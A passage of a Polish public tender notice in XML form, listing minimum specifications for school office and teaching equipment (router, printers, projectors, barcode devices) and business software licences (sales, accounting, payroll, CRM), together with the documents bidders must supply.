•	Komentowanie dokumentów. Możliwość przesyłania dokumentów e-mailem.
•	Zarządzanie pracownikami (lista pracowników) oraz dokumentami kadrowymi.
•	Zarządzanie urlopami – dodawanie wniosków i ich akceptacja elektroniczna. Konfigurowalna struktura akceptacji. Powiadomienia i raporty. Dostęp do informacji o stanie urlopu.
•	Analiza rozliczeń księgowych firmy na przejrzystych wykresach.
•	Dostęp do wszystkich faktur 24h na dobę przez 7 dni w tygodniu.
•	Brak konieczności pracy na dokumentach w formie papierowej (ograniczenie do minimum potrzeby drukowania dokumentów).
•	Zarządzanie wszystkimi dokumentami z jednego miejsca.
•	Bezpieczeństwo i poufność danych (wszystkie dane są w pełni zapewnione przez szyfr SSL), pełna zgodność z zapisami GIODO.
•	Ułatwienie dla biura rachunkowego w zdobywaniu nowych klientów – wizerunek profesjonalnego biura rachunkowego.
•	Łatwa, intuicyjna obsługa systemu – brak konieczności instalacji programu, zakupu specjalnego sprzętu czy szkolenia pracowników.
Do użytku szkolnego.
Kompatybilne z SO Windows 10 i starszymi.
Aktualizacje i serwis techniczny do 2023 r.
</przedmiot_zam><cpv1c>48000000-8</cpv1c><cpv2c>30232110-8</cpv2c><okres2c>5</okres2c><szacunkowa_wart_zam_calosc></szacunkowa_wart_zam_calosc><waluta_calosc></waluta_calosc><czy_przewiduje_udzielenie_zamowien_67>N</czy_przewiduje_udzielenie_zamowien_67><czy_przewiduje_udzielenie_zamowien_67_tekst></czy_przewiduje_udzielenie_zamowien_67_tekst><czy_czesci /><czy_czesci_wymaga /><ilosc_czesci></ilosc_czesci><ilosc_czesci_max></ilosc_czesci_max><czy_wariant /><czy_uzup /><zam_uzupelniajace></zam_uzupelniajace><czas>
        O
      </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_zak></data_zak><ii_2_lub_temp></ii_2_lub_temp><informacje_na_temat_katalogow>Termin realizacji zamówienia dla każdej z części: maksymalnie 5 dni  od dnia zawarcia umowy poprzetargowej.</informacje_na_temat_katalogow><okreslenie_warunkow></okreslenie_warunkow><informacje_dodatkowe_okreslenie_warunkow></informacje_dodatkowe_okreslenie_warunkow><sytuacja_finansowa_okreslenie_warunkow></sytuacja_finansowa_okreslenie_warunkow><sytuacja_finansowa_informacje_dodatkowe></sytuacja_finansowa_informacje_dodatkowe><zdolnosc_techniczna_okreslenie_warunkow></zdolnosc_techniczna_okreslenie_warunkow><zdolnosc_techniczna_informacje_dodatkowe></zdolnosc_techniczna_informacje_dodatkowe><czy_zdolnosc_techniczna_wymaga_wykonawcow /><czy_zamawiajacy_przewiduje_wykluczenie>T</czy_zamawiajacy_przewiduje_wykluczenie><art_24_ust_5_pkt_1>T</art_24_ust_5_pkt_1><art_24_ust_5_pkt_2 /><art_24_ust_5_pkt_3 /><art_24_ust_5_pkt_4 /><art_24_ust_5_pkt_5 /><art_24_ust_5_pkt_6 /><art_24_ust_5_pkt_7 /><art_24_ust_5_pkt_8 /><czy_oswiadczenie_niepodleganiu_wykluczenia>T</czy_oswiadczenie_niepodleganiu_wykluczenia><czy_oswiadczenie_spelnienie_kryteriow /><zaliczka /><uprawnienie></uprawnienie><wiedza></wiedza><potencjal></potencjal><zdolne></zdolne><sytuacja></sytuacja><sprawozdanie_calosc></sprawozdanie_calosc><lata_obrotowe></lata_obrotowe><oswiadczenie_potwierdzenia_1 /><oswiadczenie_potwierdzenia_2 /><oswiadczenie_potwierdzenia_3 /><oswiadczenie_potwierdzenia_4 /><oswiadczenie_potwierdzenia_5 /><oswiadczenie_potwierdzenia_6 /><oswiadczenie_potwierdzenia_7 /><oswiadczenie_potwierdzenia_8 /><oswiadczenie_potwierdzenia_9 /><oswiadczenie_potwierdzenia_10 /><oswiadczenie_wykluczenia_1 /><oswiadczenie_wykluczenia_2 /><oswiadczenie_wykluczenia_3 /><oswiadczenie_wykluczenia_4 /><oswiadczenie_wykluczenia_5 /><oswiadczenie_wykluczenia_6 /><oswiadczenie_wykluczenia_7 /><dok_podm_zag_1 /><dok_podm_zag_2 /><dok_podm_zag_3 /><dok_podm_zag_4 /><dok_potw_1 /><dok_potw_2 /><dok_potw_3 /><dok_potw_4 /><dok_potw_5 /><dok_potw_6 /><inne_dok_potw></inne_dok_potw><inne_dokumenty></inne_dokumenty><niepelnosprawne /><oswiadczenie_przedlozyc /><inne_dokumenty></inne_dokumenty><wykaz_dokumentow_zaswiadczen>1)	zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
2)	zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
3)	odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy;
4)	oświadczenie wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej w trybie jak w pkt 7.2.1 SIWZ
</wykaz_dokumentow_zaswiadczen><zakresie_warunkow_udzialu></zakresie_warunkow_udzialu><zakresie_kryteriow_selekcji></zakresie_kryteriow_selekcji><inne_dokumenty_niewymienione></inne_dokumenty_niewymienione><wykaz_potwierdzenie_okolicznosci></wykaz_potwierdzenie_okolicznosci><wadium></wadium><czy_wadium>N</czy_wadium><przewiduje_udzielenie_zaliczek></przewiduje_udzielenie_zaliczek><czy_przewiduje_udzielenie_zaliczek>N</czy_przewiduje_udzielenie_zaliczek><zlozenie_katalogow_elektronicznych_informacje_dodatkowe></zlozenie_katalogow_elektronicznych_informacje_dodatkowe><czy_dopuszcza_zlozenie_katalogow_elektronicznych /><czy_wymaga_zlozenie_katalogow_elektronicznych>N</czy_wymaga_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_oferty_wariantowej>N</czy_wymaga_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej>N</czy_dopuszcza_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej>N</czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej><liczba_wyk></liczba_wyk><minimalna_liczba_wykonawcow></minimalna_liczba_wykonawcow><maksymalna_liczba_wykonawcow></maksymalna_liczba_wykonawcow><wybor_wyk></wybor_wyk><kod_trybu>PN</kod_trybu><z_kim_umowa_bedzie_zawarta /><czy_ograniczenie_liczby_uczestnikow /><ograniczenie_liczby_uczestnikow></ograniczenie_liczby_uczestnikow><ograniczenie_liczby_uczestnikow_informacje_dodatkowe></ograniczenie_liczby_uczestnikow_informacje_dodatkowe><czy_obejmuje_ustanowienie /><obejmuje_ustanowienie></obejmuje_ustanowienie><obejmuje_ustanowienie_informacje_dodatkowe></obejmuje_ustanowienie_informacje_dodatkowe><czy_pobranie_umowy_ramowej_dynamicznego_katalogow /><czy_umowy_ramowej_dynamicznego_katalogow /><czy_zmiana_umowy>N</czy_zmiana_umowy><zmiana_umowy></zmiana_umowy><kryt_cena></kryt_cena><kryt_0>cena</kryt_0><kryt_0p>60</kryt_0p><czy_aukcja /><aukcja_dod_info></aukcja_dod_info><elementy_aukcji_elektronicznej></elementy_aukcji_elektronicznej><ograniczenia_do_przedstawianych_wartosci></ograniczenia_do_przedstawianych_wartosci><informaje_udostepnione_wykonawcom></informaje_udostepnione_wykonawcom><informaje_przebiegu_aukcji></informaje_przebiegu_aukcji><warunki_do_licytacji></warunki_do_licytacji><wykorzystanie_sprzetu_elektronicznego></wykorzystanie_sprzetu_elektronicznego><spec_www></spec_www><spec_war></spec_war><potrzeb></potrzeb><wys_nagrod></wys_nagrod><harm_diag_kon></harm_diag_kon><pod_kon_etapy></pod_kon_etapy><data_skl>08/02/2017</data_skl><godz_skl>10:00</godz_skl><miejsce></miejsce><IV_4_4_jezyki>polski</IV_4_4_jezyki><termin>
        on
      </termin><okres_liczba_dni>30</okres_liczba_dni><okres_data_do></okres_data_do><le_adres_aukcja></le_adres_aukcja><le_adres_opis></le_adres_opis><le_wymagania></le_wymagania><le_postapien></le_postapien><licytacja_etapy></licytacja_etapy><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nast /><licytacja_etapya></licytacja_etapya><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nasta /><warunki_zamkniecia_aukcji></warunki_zamkniecia_aukcji><zastosowanie_procedury_pzp>N</zastosowanie_procedury_pzp><IV_3_1_minimalne_wymagania></IV_3_1_minimalne_wymagania><IV_3_1_Przewidziane_jest_zastrzezenie /><IV_3_1_Przewidziany_podzial /><IV_3_1_etapy_negocjacji></IV_3_1_etapy_negocjacji><IV_3_1_dodatkowe_informacje></IV_3_1_dodatkowe_informacje><IV_3_2_opis_potrzeb></IV_3_2_opis_potrzeb><IV_3_2_informacja_wysokosc_nagrod></IV_3_2_informacja_wysokosc_nagrod><IV_3_2_wstepny_harmonogram></IV_3_2_wstepny_harmonogram><IV_3_2_PodzialDialogu /><IV_3_2_EtapyDialogu></IV_3_2_EtapyDialogu><IV_3_2_DodatkoweInformacje></IV_3_2_DodatkoweInformacje><IV_3_3_ElementyOpisu></IV_3_3_ElementyOpisu><IV_3_3_PodzialNegocjacji /><IV_3_3_DodatkoweInfo></IV_3_3_DodatkoweInfo><IV_IstotnePostanowienia></IV_IstotnePostanowienia><IV_LicytacjeDodatkoweInformacje></IV_LicytacjeDodatkoweInformacje><IV_6_1_sposob_udostepniania></IV_6_1_sposob_udostepniania><IV_6_1_srodki_ochrony></IV_6_1_srodki_ochrony><IV_6_2_SkrocenieTerminu>N</IV_6_2_SkrocenieTerminu><IV_6_2_Powody></IV_6_2_Powody><IV_6_6></IV_6_6><IV_6_5>N</IV_6_5><le_data_skl /><le_godz_skl /><le_miejsce_skl /><le_term_otw /><le_term_war_zam></le_term_war_zam><wym_zab_umowy></wym_zab_umowy><istotne_post></istotne_post><inf_dodat /><czy_uniewaznienie>N</czy_uniewaznienie><informacje_o_ustanowieniu_dds></informacje_o_ustanowieniu_dds><adres_poczty_internetowej_dds></adres_poczty_internetowej_dds><informacje_dotyczace_partnerstwa_innowacyjnego></informacje_dotyczace_partnerstwa_innowacyjnego><czesci><cz_0><nr_czesci>1</nr_czesci><nazwa>sprzęt biurowo-dydaktyczny</nazwa><opis>1. 	Router 	-1  szt.
Wymagania minimalne:

Porty:  4 porty LAN 10/100/1000Mb/s
             1 port WAN 10/100/1000Mb/s
             2 porty USB 2.0
Zasilanie: 12VDC / 2.5A
Standardy bezprzewodowe: IEEE 802.11ac/n/a 5GHz
                                                 IEEE 802.11b/g/n 2.4GHz
Częstotliwość pracy: 2.4GHz oraz 5GHz;
Prędkość transmisji: 5GHz: do 867Mb/s
                                     2.4GHz: do 300Mb/s;
Funkcje transmisji bezprzewodowej: Włączanie/wyłączanie transmisji bezprzewodowej, most
                                                                WDS, WMM, statystyki transmisji bezprzewodowej;
Bezpieczeństwo transmisji bezprzewodowej: 64/128bitowe szyfrowanie WEP / WPA / WPA2,
                                                                             WPA-PSK / WPA2-PSK;
Typ połączenia WAN: Dynamiczne IP/Statyczne IP/PPPoE/PPTP(Dual Access)/ L2TP(Dual
                                       Access)/BigPond;
DHCP: Serwer/klient DHCP, lista klientów DHCP, rezerwacja adresów;

Kontrola dostępu: Kontrola rodzicielska, lokalna kontrola dostępu do panelu zarządzania, lista
                                 hostów, harmonogram dostępu, zarządzanie regułami;
Zabezpieczenia zapory sieciowej: Ochrona przed atakami DoS, zapora sieciowa SPI, filtrowanie
                                                          domen, adresów IP i MAC, wiązanie adresów IP i MAC;
Protokoły: Obsługa IPv4 oraz IPv6;
Zarządzanie: kontrola dostępu, zarządzanie lokalne, zarządzanie zdalne;
Funkcja Guest Network: 1 sieć 2.4GHz, 1 sieć 5GHz;  
Wymagania systemowe: Microsoft Windows 98SE, NT, 2000, XP, Vista™, Windows 7, lub Windows 8, MAC OS, NetWare, UNIX lub Linux;


2.	Urządzenie wielofunkcyjne -2 szt.
Wymagania minimalne:

Funkcje urządzenia: drukowanie, skanowanie, kopiowanie
Komunikacja:  wireless - druk przez WiFi
Format obsługiwanych dokumentów: A4
Technika druku: laser kolor
Miesięczne obciążenie: do 30000 stron 
Szybkość drukowania w kolorze: do 18 stron A4/min 
Rozdzielczość druku w kolorze: 2400x600 dpi 
Przeznaczenie do druku: mono/kolor - tekst i grafika 
Standardowa pojemność podajników: do 250 arkuszy
Obsługiwane formaty nośników: 
A4 
A5 
A6 
Letter 
Legal 
Executive 
Folio 
3. 	Projektor -2 szt.
Wymagania minimalne:

Rozdzielczość rzeczywista 800 x 480 (WVGA)
Liczba wyświetlanych kolorów min.16,7 mln
Rzeczywisty współczynnik proporcji obrazu 16:9, 4:3
Korekcja zniekształceń trapezowych (Keystone) ± 15 (w pionie)
Źródło światła lampa bezrtęciowa (ledowa)
Żywotność lampy (tryb normalny) 20000
Jasność (tryb normalny) 800
Kontrast (tryb normalny) 800:1
Odległość projekcji 1-3,8
Wielkość obrazu 34-130
Głośniki Tak
Ilość wbudowanych głośników 2
Moc głośnika 2
Złącza (wejścia) 1 x HDMI, 1 x USB, 1 x stereo mini-jack, 1 x wejście AV mini jack
Pilot w zestawie Tak
Wyposażenie dodatkowe:
Sposób mocowania: podsufitowy (opcja obracania wyświetlanego obrazu)
Dodatkowe wyposażenie: uchwyt podsufitowy, kabel HDMI 4m, kabel audio 2 x jack 4 m.

4. 	Ekran projekcyjny -2 szt.
Wymagania minimalne:
Sposób mocowania: ścienne/sufitowe 
Rozmiar ekranu: 180x180 cm (1:1) 
Sposób rozwijania: pilot bezprzewodowy 
5.	Urządzenie wielofunkcyjne -4 szt.
Wymagania minimalne:
Funkcje urządzenia: drukowanie, skanowanie, kopiowanie
Komunikacja: kabel USB
Funkcje urządzenia: drukowanie, skanowanie, kopiowanie
Technika druku: laser kolor
Miesięczne obciążenie: do 10000 stron 
Szybkość drukowania w kolorze: do 10 stron A4/min 
Rozdzielczość druku w kolorze: 2400x600 dpi 
Przeznaczenie do druku: mono/kolor - tekst i grafika 
Standardowa pojemność podajników: do 150 arkuszy
Obsługiwane formaty nośników: 
A4 
A5 
A6 
Letter 
6.	Laserowy czytnik  kodów kreskowych -4 szt.
Wymagania minimalne:
Źródło światła laser
Technologia odczytu pojedyncza linia
Głębokość odczytu 10 000 mm
Rozdzielczość 0.127 mm
Prędkość odczytu 100
Długość przewodu 150 cm
Akcesoria w zestawie kabel USB , podstawka

7.	Drukarka kodów kreskowych i etykiet logistycznych -4 szt.
Wymagania minimalne:

Technika wydruku:  Termotansferowa /Termiczna
Rozdzielczość:  min. 200 dpi
Szybkość wydruku:  min. 150 mm/s
Maksymalna szerokość etykiet: 108 mm
Maksymalna długość etykiet:  2286 mm
Pamięć: 4MB Flash, 8MB SDRAM + slot kart MicroSD
Złącze komunikacyjne: USB, RS i Centronics,  moduł Wi-Fi (opcjonalnie)
Oprogramowanie: sterowniki Windows, BarTender (wersja TSC)
Inne wyposażenie: gilotyna.

8.	Frankownica -1 szt.
Wymagania minimalne:
Rozmiar obsługiwanych kopert: wszystkie rodzaje (powyżej 6 mm – etykiety)
Automatyczne ustawianie aktualnej daty: TAK
Licznik sumarycznej wartości ofrankowanej korespondencji: TAK
Pamięć: do 6 różnych klisz reklamowych.
Liczba użytkowników korzystających z urządzenia: do 5
Opcja drukowania zestawień ilościowych i kosztowych: TAK
Opcje przesyłek: POLCONY, PRIORYTET
Możliwość druku rejestrów urządzenia: TAK
Materiały wymienne: etykiety/paski do frankownic (pojedyncze 1000 szt., podwójne 1000 szt.)

9. 	Telefon stacjonarny z faksem -1 szt.
Wymagania minimalne:
Prędkość wydruku: 14 PPM
Maksymalna prędkość modemu: 14 400 bps (dobierana automatycznie)
Pamięć dokumentów: Ok. 100 stron w trybie odbioru dokumentów do pamięci i ok. 100 stron w trybie nadawania dokumentów
Identyfikacja Abonenta Wywołującego z prezentacją nazwy i numeru: TAK
Komunikaty na wyświetlaczu LCD i wydruki raportów w języku polskim: TAK
Komunikaty na wyświetlaczu LCD i wydruki raportów w innym języku (angielskim): OPCJONALNIE
Przycisk nawigacyjny ułatwiający dostęp do funkcji telefaksu oraz książki telefonicznej: TAK
Ilość miejsca w książce telefonicznej: do 100 wpisów
Wybieranie jednoprzyciskowe: do 20 wpisów
Rozsyłanie sekwencyjne: do 20 abonentów
Transmisja opóźniona: TAK
Elektroniczna regulacja głośności głośnika i dzwonka: TAK
Opisy na obudowie w języku polskim: TAK
Opisy na obudowie w innym języku obcym (angielskim): OPCJONALNIE
Materiały wymienne: 5 rolek papieru do faksu
10. 	Bindownica -1 szt.
Wymagania minimalne:
Format: A4 
Ilość dziurkowanych kartek: do 15
Ilość oprawianych kartek: do 500
Regulacja marginesu: TAK
Ogranicznik formatu: TAK
Miarka maksymalnej ilości dziurkowanych kartek: TAK
Wskaźnik do pomiaru grubości grzbietu: TAK
Wskaźnik ułatwiający dobór odpowiedniej średnicy grzbietu i szerokości marginesu 
Materiał obudowy i podstawy: metal 
Materiały wymienne: 
grzbiety do bindowania plastikowy – 8mm 100 szt., 16 mm 100 szt., 38 mm 100 szt (kolor dowolny)
okładki wierzchnie przezroczyste do bindowania – 300 szt. (kolor biały)
okładki spodnie do bindowania skóropodobne do bindowania – 300 szt. (kolor granatowy)

11.	Niszczarka dokumentów-1 szt.
Wymagania minimalne:
Ilość niszczonych kartek: do 5
Pojemność kosza: 7 – 7,5  litra
Typ niszczarki: ścinkowa
Rozmiar cięcia: min. 4 x 40
Niszczony materiał: papier
Inne materiały, które można niszczyć: NIE

12.	Tablica suchościeralna -2 szt.
Wymagania minimalne:
 Rozmiar: 70x100 cm
Typ montażu: stojak/trójnóg regulowany do wys. min. 180 cm
Rama: aluminiowa
Możliwość zawieszenia bloków flipchart: OPCJONALNIE
Półka na flamastry i gąbkę: TAK
Materiały wymienne: flamastry (min, 3 kolory) i gąbka.

13.	Tablica typu flipchart -2 szt.
Wymagania minimalne:
Rozmiar: 70x100 cm
Typ montażu: stojak wyposażonym w blokowane kółka
Półka na flamastry i gąbkę: TAK
Materiały wymienne: flamastry (min. 3 kolory), 5 szt. Bloków do flipchart (50 kartek gładkich/szt.)
</opis><informacje_dodatkowe></informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c>30232110-8</cpv1c>30200000-1<czas>
              O
            </czas><czas_dni>5</czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon></data_kon><kryt_cena></kryt_cena><kryt_1>cena</kryt_1><kryt_1p>60</kryt_1p></cz_0><cz_1><nr_czesci>2</nr_czesci><nazwa>oprogramowanie</nazwa><opis>1. 	System sprzedaży z obsługą magazynów	-na 32 stanowiska komputerowe
Wymagania minimalne:
•	pełna obsługa wszystkich typów dokumentów handlowych i magazynowych;
•	prowadzenie kartoteki kontrahentów, obejmującej również informacje typu CRM; możliwość definiowania rubryk z dodatkowymi informacjami;
•	prowadzenie kartoteki towarów, usług, kompletów i opakowań zwrotnych z rozbudowaną kalkulacją cen (10 poziomów cen sprzedaży, w tym ceny walutowe);
•	pełny rozdział dokumentów magazynowych i handlowych, pojedyncze lub zbiorcze generowanie faktur do dokumentów WZ itp.; automatyczne generowanie dokumentu WZ do faktury;
•	obsługa przedpłat, płatności kartą kredytową oraz sprzedaży kredytowanej;
•	obsługa zamówień z rezerwacją towarów oraz fakturami zaliczkowymi;
•	rozbudowana obsługa rachunków bankowych (złotówkowych lub walutowych) z operacjami wpłaty, wypłaty i transferu (plus opłaty prowizyjne, wyciągi, itp.);
•	pełna obsługa rozrachunków (należności i zobowiązań), w tym rozrachunków wielowalutowych;
•	wiele różnorodnych zestawień, raportów i analiz; możliwość tworzenia własnych raportów;
•	rozbudowana obsługa urządzeń zewnętrznych (kasy fiskalne, drukarki fiskalne, wagi etykietujące, czytniki kodów paskowych);
•	pełna integracja z systemem zarządzania relacjami z klientami (CRM);
•	pełna integracja z komputerową księgą przychodów i rozchodów oraz systemem finansowo-księgowym.
Do użytku szkolnego.
Kompatybilne z SO Windows 10 i starszymi.
Aktualizacje i serwis techniczny do 2023 r.


2.	 Generator Kodów Kreskowych	-na 16 stanowisk
komputerowych
Wymagania minimalne:

•	generowanie wszystkich standardowych kodów kreskowych, ze standardem ISBN włącznie. 
•	generowanie pojedynczych kodów kreskowych w formie gotowej do wydruku w programach graficznych i DTP. 
•	możliwość zapisywania kodu w różnych formatach graficznych, np.: BMP, GIF, JPEG (JPG), TIFF, PNG, PCL, EPS.
•	Obsługiwanie min. takich kodów jak ANSI/AIM Code 93, Code 128A, DUN-14, EAN-8, EAN-1 

Do użytku szkolnego.
Kompatybilne z SO Windows 10 i starszymi.
Aktualizacje i serwis techniczny do 2023 r.

3. 	Pakiet oprogramowania podstawowego (system Windows 10, pakiet Office, wybrany program antywirusowy)-32 szt.
Wymagania minimalne:
Program antywirusowy:
•	Ochrona komputera w czasie rzeczywistym, pozwalająca na bieżąco chronić komputer przed infekcjami, mechanizm skanowania plików i dysków na żądanie, którego pracę i obszary działania można w dużym stopniu konfigurować i moduł antyspaware. 
•	kwarantanna, w której umieszczane są zainfekowane pliki, 
•	harmonogram zadań, pozwalający automatyzować proces skanowania komputera
•	listy ignorowanych lokalizacji, pomijanych podczas skanowania. 
•	moduł antyspamowy, 
•	zapora sieciowa, 
•	ochrona przed atakami phishing, 
•	funkcja skanowania zewnętrznych pamięci podłączonych do komputera 
Do użytku szkolnego.
Aktualizacje i serwis techniczny do 2023 r.

4. 	Księga przychodów i rozchodów oraz system naliczania podatku zryczałtowanego-na 16 stanowisk
komputerowych
Wymagania minimalne:
•	prowadzenie księgi przychodów i rozchodów lub ewidencji podatku zryczałtowanego (w zależności od wybranej formy księgowości);
•	prowadzenie ewidencji VAT: zakupów, sprzedaży w tym ewidencjonowanie transakcji unijnych; możliwość wprowadzania sprzedaży nieudokumentowanej rozliczanej strukturą zakupów;
•	prowadzenie ewidencji danych pojazdów wykorzystywanych do celów służbowych, rachunków związanych z eksploatacją pojazdów oraz ewidencji przebiegu pojazdów;
•	prowadzenie ewidencji środków trwałych oraz wartości niematerialnych i prawnych (naliczanie i księgowanie amortyzacji, wydruk planu amortyzacji), a także prowadzenie ewidencji wyposażenia i remanentów;
•	prowadzenie kartoteki kontrahentów oraz wspólników (indywidualne parametry dotyczące rozliczeń z ZUS, automatyczne księgowanie w koszty lub odliczanie od dochodu składek ZUS i innych funduszy, obliczanie i dokumentowanie odpowiednim raportem zaliczki na podatek dochodowy);
•	rozbudowana obsługa wynagrodzeń: ewidencja osobowa, umów cywilnoprawnych oraz umów o pracę; wystawianie rachunków do umów cywilnoprawnych oraz wypłat (w tym możliwość automatycznego wyliczania na podstawie zdefiniowanych schematów wynagrodzeń);
•	naliczanie, wydruk oraz pełna obsługa wysyłki elektronicznej deklaracji skarbowych (wraz z niezbędnymi załącznikami): VAT-7, VAT-7K, VAT-7D,VAT-UE, PIT-11, PIT-36, PIT-36L, PIT-37, PIT-40, PIT-4R, PIT-28, PIT-8AR;
•	Obsługa korekt deklaracji skarbowych z wysyłką elektroniczną;
•	wystawianie deklaracji ZUS (DRA, RCA, RZA) oraz możliwość eksportu do programu Płatnik ZUS.

Do użytku szkolnego.
Kompatybilne z SO Windows 10 i starszymi.
Aktualizacje i serwis techniczny do 2023 r.
5.	System finansowo-księgowy ułatwiający prowadzenie pełnej księgowości	- na 16 stanowisk
komputerowych
Wymagania minimalne:
•	elastyczne zarządzanie planami kont: możliwość generowania wzorcowego planu kont, przeniesienia z innego roku obrotowego, automatycznie tworzenie kont kartotekowych przez podłączanie kartotek, obsługa kont pozabilansowych;
•	rozbudowana dekretacja: podział dokumentów księgowych na dekrety i dokumenty zaksięgowane, automatyzacja wykonywanych czynności (tworzenie i rozliczanie rozrachunków, generowanie zapisów VAT), obsługa dekretów walutowych;
•	zaawansowane zarządzanie rozrachunkami (tworzenie i rozliczanie); ścisłe powiązanie rozrachunków z zapisami na kontach; pełna historia rozrachunków; 
•	ewidencja i rozliczanie podatku VAT w pełni zgodne z aktualnie obowiązującą ustawą: ewidencjonowanie transakcji VAT krajowych (dostawy i nabycia), wewnątrzwspólnotowych (WNT i WDT) oraz pozaunijnych (eksport towarów, import towarów); automatyczne wyliczanie deklaracji VAT-7/7K - rozliczanie miesięczne lub kwartalne;
•	automatyczne tworzenie dekretów księgowych za pomocą dekretacji kontekstowej i importu; rozbudowane schematy importu; 
•	moduł Dokumenty do dekretacji;
•	funkcje specjalnie przygotowane dla biur rachunkowych: obsługa dowolnej liczby podmiotów gospodarczych, przenoszenie planów kont z innych podmiotów, zbiorcze operacje na licencjach, import dokumentów z pliku wygenerowanego, archiwizacja wszystkich podmiotów jednocześnie i inne;
•	ewidencja środków trwałych i wartości niematerialnych i prawnych oraz operacji z nimi związanych;
•	definiowanie i wyliczanie szeregu sprawozdań i zestawień finansowych oraz deklaracji skarbowych;
•	tworzenie wydruków graficznych (wszystkie) i tekstowych (główne); zaawansowane zarządzanie wydrukami graficznymi z poziomu programu;
•	praca w sieci komputerowej lub na pojedynczym stanowisku.
Do użytku szkolnego.
Kompatybilne z SO Windows 10 i starszymi.
Aktualizacje i serwis techniczny do 2023 r.
6.	System kadrowo-płacowy	-na 16 stanowisk
komputerowych
Wymagania minimalne:
•	ewidencja umów o pracę z bardzo elastycznym mechanizmem tworzenia zaawansowanych systemów wynagrodzeń (wiele definicji wypłat w jednej umowie, globalne lub indywidualne składniki płacowe); 
•	planowanie czasu pracy pracownika w umowach o pracę (zmiany kalendarza pracy w czasie trwania umowy, określanie wyjątków), wydruki kalendarzy miesięcznych i rocznych; 
•	 ewidencja umów zleceń, o dzieło oraz kontraktów menedżerskich (m.in. kwotowe koszty uzyskania przychodów); definiowanie elastycznych harmonogramów wypłacania rachunków dla umów cywilnoprawnych; 
•	rejestracja faktycznego czasu pracy pracownika (nadgodziny, godziny nocne, godziny absencji, rozliczanie miesięczne lub okresowe, np. co 3 miesiące);
•	ewidencja nieobecności w pracy (absencje chorobowe, urlopowe i wiele innych) dla umów o pracę i umów cywilnoprawnych (wybrane absencje); 
•	 rozbudowane składniki płacowe (naliczenia, potrącenia, składniki parametryczne, składniki definiowalne, składniki automatyczne, duże możliwości parametryzacji); 
•	 definicje list płac i zestawów płacowych, ułatwiające i automatyzujące naliczanie comiesięcznych wynagrodzeń; rozliczanie ewidencji czasu pracy, akordów, prowizji, naliczeń, potrąceń i potrąceń komorniczych w dowolnej liście płac; rozbudowany analizator wypłat; 
•	naliczanie i drukowanie deklaracji skarbowych (PIT-4, PIT-4R,PIT-8AR, PIT-11/8B, PIT-36, PIT-36L, PIT-37, PIT-40); generowanie danych do deklaracji zgłoszeniowych i rozliczeniowych ZUS.

Do użytku szkolnego.
Kompatybilne z SO Windows 10 i starszymi.
Aktualizacje i serwis techniczny do 2023 r.
7.	System zarządzania relacjami z klientami	-na 16 stanowisk
komputerowych
Wymagania minimalne:
•	szybki dostęp do wszystkich informacji dotyczących klientów: działań, wiadomości, szans sprzedaży;
•	planowanie i rejestrowanie w systemie działań takich jak: spotkania, zadania, telefony, listy, faksy i rozmowy internetowe;
•	łatwe wyszukiwanie klienta z dowolnego miejsca w programie;
•	kalendarz pokazujący zakres i termin czynności do wykonania (w widoku miesięcznym, tygodniowym i dziennym) wraz z funkcją przypominania;
•	wbudowany moduł poczty elektronicznej - automatyczne przypisywanie e-maili do odpowiednich klientów, możliwość tworzenia wiadomości zbiorczych (mailing) na podstawie zdefiniowanych szablonów oraz pól autotekstu;
•	dostęp do pełnej historii kontaktów z klientem (działania, wiadomości e-mail, wystawione dokumenty, wiarygodność płatnicza, data ostatniego kontaktu, nazwisko opiekuna klienta, wysokość udzielonych rabatów itd.);
•	możliwość przydzielania zadań oraz sprawdzania postępu prac poszczególnych pracowników;
•	liczne zestawienia (m.in. lejek sprzedaży, prognozowanie sprzedaży, skuteczność sprzedawców, aktywność użytkowników itp.), także generowane zestawień na podstawie danych typu: sprzedaż wg asortymentu, raport o towarach;
•	możliwość dostosowania do własnych potrzeb (m.in. dodawanie własnych zestawień, dostosowanie wydruków, edytowalne słowniki, pola własne, pasek szybkiego dodawania obiektów);
•	powiązania - możliwość tworzenia relacji między obiektami, takimi jak klienci, szanse sprzedaży, działania i wiadomości;
•	biblioteka dokumentów;
•	schowek, w którym można przechowywać różne obiekty (np. zadania, wiadomości, klientów, szanse sprzedaży) do późniejszego wykorzystania;
•	obsługa walut (w tym pobieranie kursów walut przez Internet);
•	wygodny system notatek;
•	strona główna zawierająca listę zadań dla użytkownika oraz prognozę wartości sprzedaży liczoną na podstawie otwartych szans sprzedaży;
